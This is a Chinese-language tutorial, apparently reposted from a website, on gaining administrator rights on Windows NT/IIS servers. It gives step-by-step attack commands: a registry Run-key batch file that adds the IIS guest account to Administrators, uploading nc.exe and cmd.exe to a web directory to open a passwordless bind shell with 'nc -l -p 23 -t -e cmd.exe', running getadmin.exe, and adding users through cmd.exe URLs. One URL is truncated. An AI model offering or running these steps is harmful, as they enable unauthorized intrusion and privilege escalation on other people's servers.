教你获取WindowsNT的Admin权限的方法

一、通过修改注册表

凡是具有登录NT本机的用户，例如IUSR_machine，都具有对 HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run 项的可读可写权限，该用户可以远程访问这个项。比如，他可以创建一个bat文件，文件内容为：cmd.exe /c net localgroup administrators IUSR_machine /add，把该文件copy到winnt目录下，然后在注册表上述的项添加一个数值，指向这个文件。

那么，当下次Admin登录到该机器上时，就会自动把IUSR_machine添加到Administrators组。

另，注册表键HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Startup 也可以这么做。

二、自建Telnet服务在NT上执行指令

要求用户有文件上传权限，而且该目录位于web目录下，该目录允许执行，下面是具体步骤。

假设你的目录是www.xxx.com/frankie，那么，把cmd.exe(位于C:\winnt\system32\cmd.exe)和Netcat里面包含的nc.exe传到这个目录上去。

然后，在浏览器端输入：

http://www.xxx.com/frankie/cmd.e ... 20-t -e cmd.exe

这时候，你的浏览器将停止不动，实际上，Server上的Telnet的服务已经产生了。

这时，用Telnet连接www.xxx.com的23端口。你发现，不用密码，不用登陆，对方C:\提示符已经出现在你的眼前！更妙的是，这个Telnet server是一个一次性的服务，当客户端一退出，该服务也将终止。

Netcat不同于一般的特洛伊木马，它可以构建任何的TCP连接服务。在浏览器端输入上述的字符串，等价于在NT的Dos方式下输入

nc -l -p 23 -t -e cmd.exe

三、入侵NTserver典型途径V2.0

1、如果你有NT/IIS服务器的任何一个帐号，哪怕是guest帐号，都可以获得root。

2、用Netcat和iishack可以获得root。

3、Iusr_计算机名这个帐号有ftp上传，web执行等权限。

4、在Web server上执行程序是入侵NT的关键。

5、要在Web server上执行程序就先要上传文件到cgi-bin目录或者scripts目录等有执行权限的目录上去。

在本文中，目标机器的名称是ntsvr2，目标机器的域名是www.xxx.com，目标机器上有scripts和cgi-bin目录，scripts目录下有uploadn.asp等asp程序，可能有guest帐号，肯定有iusr_ntsvr2这个帐号。

第一个方法、用Iusr_ntsvr2后者Guest这两个帐号

这里假设我们已经破解了这个帐号的密码，在浏览器输入：

http://www.xxx.com/scripts/uploadn.asp

然后输入：

http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2

CGI Error

下面可以Add user：

http://www.xxx.com/cgi-bin/cmd.exe?/c c:\winnt\system32\net.exe user china news /add

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有